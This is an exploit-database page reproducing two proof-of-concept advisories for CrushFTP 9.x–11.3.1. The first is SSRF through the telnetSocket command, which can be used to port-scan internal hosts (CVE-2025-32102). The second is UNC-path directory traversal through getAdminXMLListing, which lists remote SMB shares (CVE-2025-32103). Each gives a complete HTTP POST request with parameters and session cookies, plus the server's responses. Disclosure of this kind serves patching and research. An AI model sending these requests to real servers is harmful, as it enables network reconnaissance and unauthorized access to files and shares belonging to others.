Exploit for CrushFTP 9.x / 10.8.4 / 11.3.1 Server-Side Request Forgery / Directory Traversal CVE-2025-32102 CVE-2025-32103

Name: Exploit for CrushFTP 9.x / 10.8.4 / 11.3.1 Server-Side Request Forgery / Directory Traversal CVE-2025-32102 CVE-2025-32103
Rating: 5 (47 reviews)
2025-04-14 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:190460
<!--
    # Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and
    11.1.0 (as well as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32102
    # Vulnerability: CWE-918
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
    via the host and port parameters in a command=telnetSocket request to the
    /WebInterface/function/ URI.
    
    2. Proof of Concept
    
    The application has a form to establish telnet connections. The parameters
    where the target is entered are host and port, for example,
    "host=127.0.0.1&port=8080". It can be used to scan remote ports, as it
    receives the string "Connected" if it connects successfully, whereas it
    receives "Connection%20refused" if it does not connect
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
    Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 101
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
    currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq
    
    Open port: 8080
    <commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
    </data></response></commandResult>
    
    Close port: 8888
    <commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
    (/127.0.0.1)</error>Error:java.lang.NullPointerException
    </response></commandResult>
    
    
    3. Solution:
    
    Update to last version this product.
    
    -->
    <!--
    # Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well
    as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32103
    # Vulnerability: CWE-40
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
    directory traversal via the /WebInterface/function/ URI to read files
    accessible by SMB at UNC share pathnames, bypassing SecurityManager
    restrictions.
    
    2. Proof of Concept
    
    The application's logic does not account for the fact that, when listing
    directories or files, the path can be modified to allow UNC paths from
    another machine on the network or on the internet instead of local files.
    An attacker injects a UNC path (\server\resource) instead of a local path
    (such as C:/PATH) and gains access to remote directories or files. This is
    more specific than typical Path Traversal and occurs when network paths are
    not properly filtered or restricted.
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
    Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 113
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
    currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq
    
    <?xml version="1.0" encoding="UTF-8"?>
    <listingInfo type="properties">
    <path>////vboxsrv/demo/</path>
    <privs>(read)(view)</privs>
    <listing>l = new Array();
    lp = {};
    lp.name="directorio1";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio1";
    lp.privs="(read)(view)";
    lp.size="0";
    lp.modified="0";
    lp.created="null";
    l[l.length] = lp;
    lp = {};
    lp.name="directorio2";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio2";
    ...
    
    
    The vulnerable parameter is path, where the local path can be changed to a
    remote path, thereby displaying remote directories. This could later be
    used for potential file downloads within those directories, just as it
    would if they were local.
    
    
    3. Solution:
    
    Update to last version this product.
    
    -->